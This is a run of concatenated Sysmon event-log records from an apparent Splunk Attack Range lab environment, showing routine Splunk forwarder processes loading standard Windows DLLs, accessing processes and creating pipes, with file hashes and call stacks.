OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057345369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057345367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057345355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x800000000000000057345350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.504{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.490{8B6011A9-5B44-618E-40F3-04000000F101}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:08.489{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:08.489{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:08.489{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:08.489{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:08.489{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:08.489{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x800000000000000021219580Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.306{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B44-618E-09CE-08000000F101}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219579Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.306{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219578Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.306{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219577Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.306{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219576Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.306{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219575Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.306{AD5E2759-5432-6143-0500-00000000F101}4122828C:\Windows\system32\csrss.exe{AD5E2759-5B44-618E-09CE-08000000F101}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219574Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.306{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B44-618E-09CE-08000000F101}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219573Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:08.291{AD5E2759-5B44-618E-09CE-08000000F101}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 534500x800000000000000057345341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.036{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057345340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.036{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057345339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.036{8B6011A9-5B43-618E-3FF3-04000000F101}22729768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.036{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:08.036{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 